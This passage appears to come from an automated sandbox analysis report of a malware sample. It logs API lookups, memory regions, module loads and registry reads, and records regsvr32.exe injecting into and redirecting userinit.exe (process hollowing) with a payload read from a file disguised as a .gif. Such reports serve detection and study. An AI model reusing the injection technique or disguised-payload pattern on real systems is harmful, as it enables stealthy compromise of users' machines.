Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6cf02542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6cf01d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6cf0238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6cf020c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6cf01fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6cf01e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6cf01f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6cf01ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6cf0216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6cf022be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6cf021e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6ceb20ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6ceb20b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6ceb20c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6ceb20d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 397295	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #34: userinit.exe

222

0

»

Information	Value
ID	#34
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:57, Reason: Child Process
Unmonitor	End Time: 00:02:01, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0xfc8
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x FCC 0x FD8 0x FDC

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rwx	-
pagefile_0x00000000000e0000	0x000e0000	0x000e6fff	Pagefile Backed Memory	r	-
private_0x00000000000f0000	0x000f0000	0x000fffff	Private Memory	rw	-
pagefile_0x0000000000100000	0x00100000	0x00101fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00110000	0x00110fff	Memory Mapped File	r	-
private_0x0000000000120000	0x00120000	0x00120fff	Private Memory	rwx	-
pagefile_0x0000000000130000	0x00130000	0x00131fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x00140000	0x00140fff	Memory Mapped File	r	-
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	rw	-
pagefile_0x00000000001b0000	0x001b0000	0x00277fff	Pagefile Backed Memory	r	-
private_0x0000000000290000	0x00290000	0x0038ffff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
userinit.exe	0x004b0000	0x004b8fff	Memory Mapped File	rwx	-
pagefile_0x00000000004c0000	0x004c0000	0x005c0fff	Pagefile Backed Memory	r	-
private_0x00000000005d0000	0x005d0000	0x0066ffff	Private Memory	rw	-
private_0x0000000000670000	0x00670000	0x0067ffff	Private Memory	rw	-
pagefile_0x0000000000680000	0x00680000	0x0127ffff	Pagefile Backed Memory	r	-
private_0x0000000001280000	0x01280000	0x0137ffff	Private Memory	-	-
pagefile_0x0000000001380000	0x01380000	0x0145efff	Pagefile Backed Memory	r	-
private_0x0000000001460000	0x01460000	0x015dffff	Private Memory	rw	-
private_0x0000000001460000	0x01460000	0x014dffff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01560fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01564fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01568fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x0156cfff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01570fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01574fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01578fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x0157cfff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01580fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01584fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01588fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x0158cfff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01590fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01594fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01598fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x0159cfff	Private Memory	rw	-
private_0x00000000015a0000	0x015a0000	0x015dffff	Private Memory	rw	-
staticcache.dat	0x015e0000	0x01f0ffff	Memory Mapped File	r	-
pagefile_0x0000000001f10000	0x01f10000	0x02302fff	Pagefile Backed Memory	r	-
private_0x0000000002310000	0x02310000	0x0241cfff	Private Memory	rw	-
private_0x0000000002420000	0x02420000	0x0251ffff	Private Memory	rw	-
private_0x0000000002520000	0x02520000	0x0271ffff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027a2fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027a6fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027aafff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027aefff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027b2fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027b6fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027bafff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027befff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027c2fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027c6fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027cafff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027cefff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027d2fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027d6fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027dafff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027defff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027e4fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027e8fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027ecfff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027f2fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027f6fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027fafff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027fefff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02804fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02808fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0280cfff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02812fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02816fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0281afff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0281efff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02824fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02828fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0282cfff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028a0fff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028b6fff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028bafff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028befff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028d4fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028d8fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028dcfff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028e0fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028f6fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028fafff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028fefff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02914fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02918fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0291cfff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02920fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02936fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x0293afff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x0293ffff	Private Memory	-	-
private_0x00000000028b0000	0x028b0000	0x02972fff	Private Memory	rw	-
private_0x00000000028c0000	0x028c0000	0x02990fff	Private Memory	rw	-
private_0x00000000028f0000	0x028f0000	0x029d2fff	Private Memory	rw	-
private_0x0000000002900000	0x02900000	0x029f0fff	Private Memory	rw	-
private_0x0000000002930000	0x02930000	0x02a32fff	Private Memory	rw	-
private_0x0000000002940000	0x02940000	0x02a52fff	Private Memory	rwx	-
private_0x0000000002a60000	0x02a60000	0x02b5ffff	Private Memory	-	-
private_0x0000000002ba0000	0x02ba0000	0x02bdffff	Private Memory	rw	-
private_0x0000000002c60000	0x02c60000	0x02d5ffff	Private Memory	rw	-
sortdefault.nls	0x02d60000	0x0302efff	Memory Mapped File	r	-
olepro32.dll	0x6ce90000	0x6cea8fff	Memory Mapped File	rwx	-
comctl32.dll	0x6ced0000	0x6cf53fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd6000	0x7ffd6000	0x7ffd6fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffd6008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0xfcc, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6ce90000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6ced0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = î, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6cf0266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6cf02542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6cf01d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6cf0238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6cf020c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6cf01fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6cf01e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6cf01f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6cf01ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6cf0216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6cf022be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6cf021e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6ce920ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6ce920b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6ce920c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6ce920d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
